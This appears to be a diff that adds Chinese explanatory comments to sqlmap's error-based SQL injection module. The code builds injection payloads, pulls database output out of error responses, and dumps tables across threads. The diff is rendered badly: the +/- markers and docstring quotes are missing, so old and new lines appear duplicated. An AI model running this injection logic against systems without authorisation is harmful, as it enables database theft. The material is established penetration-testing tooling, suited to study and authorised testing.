@ -5,6 +5,7 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file ' LICENSE ' for copying permission
# 导入需要的模块
from __future__ import print_function
import re
@ -63,98 +64,127 @@ from lib.utils.safe2bin import safecharencode
from thirdparty import six
def _oneShotErrorUse ( expression , field = None , chunkTest = False ) :
offset = 1
rotator = 0
partialValue = None
threadData = getCurrentThreadData ( )
retVal = hashDBRetrieve ( expression , checkConf = True )
参数 :
expression - 要执行的SQL表达式
field - 要查询的字段名 ( 可选 )
chunkTest - 是否为分块测试模式 ( 用于确定最佳查询长度 )
返回 :
# 初始化变量
offset = 1 # 结果偏移量,用于分块获取数据
rotator = 0 # 旋转字符索引,用于显示进度
partialValue = None # 存储部分查询结果
threadData = getCurrentThreadData ( ) # 获取当前线程数据
retVal = hashDBRetrieve ( expression , checkConf = True ) # 尝试从缓存中获取结果
# 如果缓存的结果包含部分值标记,则提取部分值
if retVal and PARTIAL_VALUE_MARKER in retVal :
partialValue = retVal = retVal . replace ( PARTIAL_VALUE_MARKER , " " )
logger . info ( " resuming partial value: ' %s ' " % _formatPartialContent ( partialValue ) )
offset + = len ( partialValue )
offset + = len ( partialValue ) # 调整偏移量继续获取剩余数据
# 标记是否从缓存恢复数据
threadData . resumed = retVal is not None and not partialValue
# 对特定数据库进行错误分块长度检测
# 这是为了找到最佳的查询长度,避免数据库截断结果
if any ( Backend . isDbms ( dbms ) for dbms in ( DBMS . MYSQL , DBMS . MSSQL , DBMS . SYBASE , DBMS . ORACLE ) ) and kb . errorChunkLength is None and not chunkTest and not kb . testMode :
debugMsg = " searching for error chunk length... "
logger . debug ( debugMsg )
seen = set ( )
seen = set ( ) # 记录已测试过的长度
current = MAX_ERROR_CHUNK_LENGTH # 从最大长度开始测试
# 二分查找最佳长度
while current > = MIN_ERROR_CHUNK_LENGTH :
testChar = str ( current % 10 )
testChar = str ( current % 10 ) # 测试字符
# 根据不同数据库构造测试查询
if Backend . isDbms ( DBMS . ORACLE ) :
testQuery = " RPAD( ' %s ' , %d , ' %s ' ) " % ( testChar , current , testChar )
else :
testQuery = " %s ( ' %s ' , %d ) " % ( " REPEAT " if Backend . isDbms ( DBMS . MYSQL ) else " REPLICATE " , testChar , current )
testQuery = " SELECT %s " % ( agent . hexConvertField ( testQuery ) if conf . hexConvert else testQuery )
# 执行测试查询
result = unArrayizeValue ( _oneShotErrorUse ( testQuery , chunkTest = True ) )
seen . add ( current )
# 分析测试结果确定分块长度
if ( result or " " ) . startswith ( testChar ) :
if result == testChar * current :
kb . errorChunkLength = current
kb . errorChunkLength = current # 找到合适的长度
else :
result = re . search ( r " \ A \ w+ " , result ) . group ( 0 )
candidate = len ( result ) - len ( kb . chars . stop )
current = candidate if candidate != current and candidate not in seen else current - 1
else :
current = current / / 2
current = current / / 2 # 二分缩小范围
# 保存找到的分块长度
if kb . errorChunkLength :
hashDBWrite ( HASHDB_KEYS . KB_ERROR_CHUNK_LENGTH , kb . errorChunkLength )
else :
kb . errorChunkLength = 0
# 如果没有缓存结果或者有部分值,执行实际查询
if retVal is None or partialValue :
try :
while True :
check = r " (?si) %s (?P<result>.*?) %s " % ( kb . chars . start , kb . chars . stop )
trimCheck = r " (?si) %s (?P<result>[^< \ n]*) " % kb . chars . start
# 定义用于提取结果的正则表达式
check = r " (?si) %s (?P<result>.*?) %s " % ( kb . chars . start , kb . chars . stop ) # 完整结果匹配
trimCheck = r " (?si) %s (?P<result>[^< \ n]*) " % kb . chars . start # 截断结果匹配
# 处理字段转换
if field :
nulledCastedField = agent . nullAndCastField ( field )
nulledCastedField = agent . nullAndCastField ( field ) # 转换字段格式
# 对特定数据库进行分块处理
if any ( Backend . isDbms ( dbms ) for dbms in ( DBMS . MYSQL , DBMS . MSSQL , DBMS . SYBASE , DBMS . ORACLE ) ) and not any ( _ in field for _ in ( " COUNT " , " CASE " ) ) and kb . errorChunkLength and not chunkTest :
extendedField = re . search ( r " [^ ,]* %s [^ ,]* " % re . escape ( field ) , expression ) . group ( 0 )
if extendedField != field : # e.g. MIN(surname)
if extendedField != field : # 处理聚合函数,如 MIN(surname)
nulledCastedField = extendedField . replace ( field , nulledCastedField )
field = extendedField
nulledCastedField = queries [ Backend . getIdentifiedDbms ( ) ] . substring . query % ( nulledCastedField , offset , kb . errorChunkLength )
# Forge the error-based SQL injection request
vector = getTechniqueData ( ) . vector
query = agent . prefixQuery ( vector )
query = agent . suffixQuery ( query )
injExpression = expression . replace ( field , nulledCastedField , 1 ) if field else expression
injExpression = unescaper . escape ( injExpression )
injExpression = query . replace ( " [QUERY] " , injExpression )
payload = agent . payload ( newValue = injExpression )
# 构造注入payload
vector = getTechniqueData ( ) . vector # 获取注入向量
query = agent . prefixQuery ( vector ) # 添加前缀
query = agent . suffixQuery ( query ) # 添加后缀
injExpression = expression . replace ( field , nulledCastedField , 1 ) if field else expression # 替换字段
injExpression = unescaper . escape ( injExpression ) # 转义特殊字符
injExpression = query . replace ( " [QUERY] " , injExpression ) # 构造最终查询
payload = agent . payload ( newValue = injExpression ) # 生成payload
# Perform the request
# 发送HTTP请求
page , headers , _ = Request . queryPage ( payload , content = True , raise404 = False )
incrementCounter ( getTechnique ( ) )
incrementCounter ( getTechnique ( ) ) # 增加计数器
# 处理特殊字符转义
if page and conf . noEscape :
page = re . sub ( r " ( ' | \ %% 27) %s ( ' | \ %% 27).*?( ' | \ %% 27) %s ( ' | \ %% 27) " % ( kb . chars . start , kb . chars . stop ) , " " , page )
# Parse the returned page to get the exact error-based
# SQL injection output
# 从返回内容中提取结果
output = firstNotNone (
extractRegexResult ( check , page ) ,
extractRegexResult ( check , threadData . lastHTTPError [ 2 ] if wasLastResponseHTTPError ( ) else None ) ,
extractRegexResult ( check , listToStrValue ( ( headers [ header ] for header in headers if header . lower ( ) != HTTP_HEADER . URI . lower ( ) ) if headers else None ) ) ,
extractRegexResult ( check , threadData . lastRedirectMsg [ 1 ] if threadData . lastRedirectMsg and threadData . lastRedirectMsg [ 0 ] == threadData . lastRequestUID else None )
extractRegexResult ( check , page ) , # 从页面内容提取
extractRegexResult ( check , threadData . lastHTTPError [ 2 ] if wasLastResponseHTTPError ( ) else None ) , # 从错误信息提取
extractRegexResult ( check , listToStrValue ( ( headers [ header ] for header in headers if header . lower ( ) != HTTP_HEADER . URI . lower ( ) ) if headers else None ) ) , # 从响应头提取
extractRegexResult ( check , threadData . lastRedirectMsg [ 1 ] if threadData . lastRedirectMsg and threadData . lastRedirectMsg [ 0 ] == threadData . lastRequestUID else None ) # 从重定向信息提取
# 处理输出结果
if output is not None :
output = getUnicode ( output )
output = getUnicode ( output ) # 转换为Unicode
else :
# 处理被截断的结果
trimmed = firstNotNone (
extractRegexResult ( trimCheck , page ) ,
extractRegexResult ( trimCheck , threadData . lastHTTPError [ 2 ] if wasLastResponseHTTPError ( ) else None ) ,
@ -163,12 +193,14 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
if trimmed :
# 警告可能的结果截断
if not chunkTest :
warnMsg = " possible server trimmed output detected "
warnMsg + = " (due to its length and/or content): "
warnMsg + = safecharencode ( trimmed )
logger . warning ( warnMsg )
# 尝试提取部分结果
if not kb . testMode :
check = r " (?P<result>[^<> \ n]*?) %s " % kb . chars . stop [ : 2 ]
output = extractRegexResult ( check , trimmed , re . IGNORECASE )
@ -179,78 +211,105 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
else :
output = output . rstrip ( )
# 处理不同数据库的结果拼接
if any ( Backend . isDbms ( dbms ) for dbms in ( DBMS . MYSQL , DBMS . MSSQL , DBMS . SYBASE , DBMS . ORACLE ) ) :
if offset == 1 :
retVal = output
retVal = output # 第一块直接赋值
else :
retVal + = output if output else ' '
retVal + = output if output else ' ' # 后续块拼接
# 判断是否需要继续获取下一块
if output and kb . errorChunkLength and len ( output ) > = kb . errorChunkLength and not chunkTest :
offset + = kb . errorChunkLength
offset + = kb . errorChunkLength # 增加偏移量
else :
break # 获取完成
# 显示进度
if output and conf . verbose in ( 1 , 2 ) and not any ( ( conf . api , kb . bruteMode ) ) :
if kb . fileReadMode :
if kb . fileReadMode : # 文件读取模式
dataToStdout ( _formatPartialContent ( output ) . replace ( r " \ n " , " \n " ) . replace ( r " \ t " , " \t " ) )
elif offset > 1 :
elif offset > 1 : # 显示旋转进度条
rotator + = 1
if rotator > = len ( ROTATING_CHARS ) :
rotator = 0
dataToStdout ( " \r %s \r " % ROTATING_CHARS [ rotator ] )
else :
retVal = output
retVal = output # 其他数据库直接返回结果
except :
# 异常处理,保存部分结果
if retVal is not None :
hashDBWrite ( expression , " %s %s " % ( retVal , PARTIAL_VALUE_MARKER ) )
retVal = decodeDbmsHexValue ( retVal ) if conf . hexConvert else retVal
# 处理结果编码
retVal = decodeDbmsHexValue ( retVal ) if conf . hexConvert else retVal # 十六进制解码
if isinstance ( retVal , six . string_types ) :
retVal = htmlUnescape ( retVal ) . replace ( " <br> " , " \n " )
retVal = htmlUnescape ( retVal ) . replace ( " <br> " , " \n " ) # HTML解码
retVal = _errorReplaceChars ( retVal )
retVal = _errorReplaceChars ( retVal ) # 替换特殊字符
# 缓存结果
if retVal is not None :
hashDBWrite ( expression , retVal )
else :
# 从缓存结果中提取数据
_ = " (?si) %s (?P<result>.*?) %s " % ( kb . chars . start , kb . chars . stop )
retVal = extractRegexResult ( _ , retVal ) or retVal
return safecharencode ( retVal ) if kb . safeCharEncode else retVal
def _errorFields ( expression , expressionFields , expressionFieldsList , num = None , emptyFields = None , suppressOutput = False ) :
values = [ ]
origExpr = None
参数 :
expression - SQL表达式
expressionFields - 表达式中的字段
expressionFieldsList - 字段列表
num - 行号 ( 可选 )
emptyFields - 空字段列表 ( 可选 )
suppressOutput - 是否抑制输出
返回 :
values = [ ] # 存储所有字段的值
origExpr = None # 保存原始表达式
width = getConsoleWidth ( )
threadData = getCurrentThreadData ( )
width = getConsoleWidth ( ) # 获取控制台宽度
threadData = getCurrentThreadData ( ) # 获取当前线程数据
# 遍历所有字段
for field in expressionFieldsList :
output = None
# 跳过ROWNUM字段
if field . startswith ( " ROWNUM " ) :
# 处理行号限制
if isinstance ( num , int ) :
origExpr = expression
expression = agent . limitQuery ( num , expression , field , expressionFieldsList [ 0 ] )
# 替换表达式中的字段
if " ROWNUM " in expressionFieldsList :
expressionReplaced = expression
else :
expressionReplaced = expression . replace ( expressionFields , field , 1 )
# 执行查询获取字段值
output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse ( expressionReplaced , field )
# 检查线程是否需要继续
if not kb . threadContinue :
return None
# 输出结果
if not any ( ( suppressOutput , kb . bruteMode ) ) :
if kb . fileReadMode and output and output . strip ( ) :
print ( )
@ -262,6 +321,7 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e
dataToStdout ( " %s \n " % status )
# 恢复原始表达式
if isinstance ( num , int ) :
expression = origExpr
@ -271,72 +331,96 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e
def _errorReplaceChars ( value ) :
Restores safely replaced characters
参数 :
value - 需要还原的字符串
返回 :
retVal = value
if value :
retVal = retVal . replace ( kb . chars . space , " " ) . replace ( kb . chars . dollar , " $ " ) . replace ( kb . chars . at , " @ " ) . replace ( kb . chars . hash_ , " # " )
# 替换特殊字符
retVal = retVal . replace ( kb . chars . space , " " ) # 空格
retVal = retVal . replace ( kb . chars . dollar , " $ " ) # 美元符号
retVal = retVal . replace ( kb . chars . at , " @ " ) # @符号
retVal = retVal . replace ( kb . chars . hash_ , " # " ) # #符号
return retVal
def _formatPartialContent ( value ) :
Prepares ( possibly hex - encoded ) partial content for safe console output
参数 :
value - 需要格式化的值
返回 :
if value and isinstance ( value , six . string_types ) :
try :
value = decodeHex ( value , binary = False )
value = decodeHex ( value , binary = False ) # 尝试十六进制解码
except :
finally :
value = safecharencode ( value )
value = safecharencode ( value ) # 安全编码
return value
def errorUse ( expression , dump = False ) :
Retrieve the output of a SQL query taking advantage of the error - based
SQL injection vulnerability on the affected parameter .
参数 :
expression - SQL表达式
dump - 是否为转储模式
返回 :
# 初始化注入技术
initTechnique ( getTechnique ( ) )
abortedFlag = False
count = None
emptyFields = [ ]
start = time . time ( )
startLimit = 0
stopLimit = None
value = None
# 初始化变量
abortedFlag = False # 中断标记
count = None # 结果计数
emptyFields = [ ] # 空字段列表
start = time . time ( ) # 开始时间
startLimit = 0 # 起始限制
stopLimit = None # 结束限制
value = None # 结果值
# 获取表达式字段信息
_ , _ , _ , _ , _ , expressionFieldsList , expressionFields , _ = agent . getFields ( expression )
# Set kb.partRun in case the engine is called from the API
# 设置部分运行标记(API模式)
kb . partRun = getPartRun ( alias = False ) if conf . api else None
# We have to check if the SQL query might return multiple entries
# and in such case forge the SQL limiting the query output one
# entry at a time
# NOTE: we assume that only queries that get data from a table can
# return multiple entries
# 检查SQL查询是否可能返回多条记录
if ( dump and ( conf . limitStart or conf . limitStop ) ) or ( " FROM " in expression . upper ( ) and ( ( Backend . getIdentifiedDbms ( ) not in FROM_DUMMY_TABLE ) or ( Backend . getIdentifiedDbms ( ) in FROM_DUMMY_TABLE and not expression . upper ( ) . endswith ( FROM_DUMMY_TABLE [ Backend . getIdentifiedDbms ( ) ] ) ) ) and ( " (CASE " not in expression . upper ( ) or ( " (CASE " in expression . upper ( ) and " WHEN use " in expression ) ) ) and not re . search ( SQL_SCALAR_REGEX , expression , re . I ) :
# 添加限制条件
expression , limitCond , topLimit , startLimit , stopLimit = agent . limitCondition ( expression , dump )
if limitCond :
# Count the number of SQL query entries output
# 计算查询结果数量
countedExpression = expression . replace ( expressionFields , queries [ Backend . getIdentifiedDbms ( ) ] . count . query % ( ' * ' if len ( expressionFieldsList ) > 1 else expressionFields ) , 1 )
# 移除ORDER BY子句(计数时不需要)
if " ORDER BY " in countedExpression . upper ( ) :
_ = countedExpression . upper ( ) . rindex ( " ORDER BY " )
countedExpression = countedExpression [ : _ ]
# 获取计数结果
_ , _ , _ , _ , _ , _ , countedExpressionFields , _ = agent . getFields ( countedExpression )
count = unArrayizeValue ( _oneShotErrorUse ( countedExpression , countedExpressionFields ) )
# 处理结果数量
if isNumPosStrValue ( count ) :
# 限制最大结果数
if isinstance ( stopLimit , int ) and stopLimit > 0 :
stopLimit = min ( int ( count ) , int ( stopLimit ) )
else :
@ -347,6 +431,7 @@ def errorUse(expression, dump=False):
logger . debug ( debugMsg )
elif count and not count . isdigit ( ) :
# 无法计数时假设只有一条结果
warnMsg = " it was not possible to count the number "
warnMsg + = " of entries for the SQL query provided. "
warnMsg + = " sqlmap will assume that it returns only "
@ -356,15 +441,18 @@ def errorUse(expression, dump=False):
stopLimit = 1
elif not isNumPosStrValue ( count ) :
# 处理空结果
if not count :
warnMsg = " the SQL query provided does not "
warnMsg + = " return any output "
logger . warning ( warnMsg )
else :
value = [ ] # for empty tables
value = [ ] # 空表
return value
# 多线程处理多条记录
if isNumPosStrValue ( count ) and int ( count ) > 1 :
# 询问是否移除ORDER BY以提高速度
if " ORDER BY " in expression and ( stopLimit - startLimit ) > SLOW_ORDER_COUNT_THRESHOLD :
message = " due to huge table size do you want to remove "
message + = " ORDER BY clause gaining speed over consistency? [y/N] "
@ -372,26 +460,30 @@ def errorUse(expression, dump=False):
if readInput ( message , default = ' N ' , boolean = True ) :
expression = expression [ : expression . index ( " ORDER BY " ) ]
# 设置线程数
numThreads = min ( conf . threads , ( stopLimit - startLimit ) )
threadData = getCurrentThreadData ( )
try :
# 创建结果范围迭代器
threadData . shared . limits = iter ( xrange ( startLimit , stopLimit ) )
except OverflowError :
errMsg = " boundary limits ( %d , %d ) are too large. Please rerun " % ( startLimit , stopLimit )
errMsg + = " with switch ' --fresh-queries ' "
raise SqlmapDataException ( errMsg )
threadData . shared . value = BigArray ( )
threadData . shared . buffered = [ ]
threadData . shared . counter = 0
threadData . shared . lastFlushed = startLimit - 1
threadData . shared . showEta = conf . eta and ( stopLimit - startLimit ) > 1
# 初始化共享数据
threadData . shared . value = BigArray ( ) # 存储结果
threadData . shared . buffered = [ ] # 缓冲区
threadData . shared . counter = 0 # 计数器
threadData . shared . lastFlushed = startLimit - 1 # 最后刷新位置
threadData . shared . showEta = conf . eta and ( stopLimit - startLimit ) > 1 # 是否显示进度
if threadData . shared . showEta :
threadData . shared . progress = ProgressBar ( maxValue = ( stopLimit - startLimit ) )
# 检查空列
if kb . dumpTable and ( len ( expressionFieldsList ) < ( stopLimit - startLimit ) > CHECK_ZERO_COLUMNS_THRESHOLD ) :
for field in expressionFieldsList :
if _oneShotErrorUse ( " SELECT COUNT( %s ) FROM %s " % ( field , kb . dumpTable ) ) == ' 0 ' :
@ -400,17 +492,23 @@ def errorUse(expression, dump=False):
debugMsg + = " dumped as it appears to be empty "
logger . debug ( debugMsg )
# 对大量数据禁用恢复信息显示
kb . suppressResumeInfo = True
debugMsg = " suppressing possible resume console info because of "
debugMsg + = " large number of rows. It might take too long "
logger . debug ( debugMsg )
# 执行多线程查询
try :
def errorThread ( ) :
threadData = getCurrentThreadData ( )
while kb . threadContinue :
# 获取下一个查询范围
with kb . locks . limit :
try :
threadData . shared . counter + = 1
@ -418,51 +516,63 @@ def errorUse(expression, dump=False):
except StopIteration :
# 执行查询
output = _errorFields ( expression , expressionFields , expressionFieldsList , num , emptyFields , threadData . shared . showEta )
if not kb . threadContinue :
# 处理单值结果
if output and isListLike ( output ) and len ( output ) == 1 :
output = unArrayizeValue ( output )
# 保存结果
with kb . locks . value :
index = None
if threadData . shared . showEta :
threadData . shared . progress . progress ( threadData . shared . counter )
# 按顺序插入结果
for index in xrange ( 1 + len ( threadData . shared . buffered ) ) :
if index < len ( threadData . shared . buffered ) and threadData . shared . buffered [ index ] [ 0 ] > = num :
threadData . shared . buffered . insert ( index or 0 , ( num , output ) )
# 刷新连续的结果
while threadData . shared . buffered and threadData . shared . lastFlushed + 1 == threadData . shared . buffered [ 0 ] [ 0 ] :
threadData . shared . lastFlushed + = 1
threadData . shared . value . append ( threadData . shared . buffered [ 0 ] [ 1 ] )
del threadData . shared . buffered [ 0 ]
# 运行多线程
runThreads ( numThreads , errorThread )
except KeyboardInterrupt :
# 处理用户中断
abortedFlag = True
warnMsg = " user aborted during enumeration. sqlmap "
warnMsg + = " will display partial output "
logger . warning ( warnMsg )
finally :
# 保存剩余结果
threadData . shared . value . extend ( _ [ 1 ] for _ in sorted ( threadData . shared . buffered ) )
value = threadData . shared . value
kb . suppressResumeInfo = False
# 单条记录查询
if not value and not abortedFlag :
value = _errorFields ( expression , expressionFields , expressionFieldsList )
# 处理返回结果格式
if value and isListLike ( value ) :
if len ( value ) == 1 and isinstance ( value [ 0 ] , ( six . string_types , type ( None ) ) ) :
value = unArrayizeValue ( value )
value = unArrayizeValue ( value ) # 单值结果
elif len ( value ) > 1 and stopLimit == 1 :
value = [ value ]
value = [ value ] # 多值结果
# 计算执行时间
duration = calculateDeltaSeconds ( start )
# 输出调试信息
if not kb . bruteMode :
debugMsg = " performed %d quer %s in %.2f seconds " % ( kb . counters [ getTechnique ( ) ] , ' y ' if kb . counters [ getTechnique ( ) ] == 1 else " ies " , duration )
logger . debug ( debugMsg )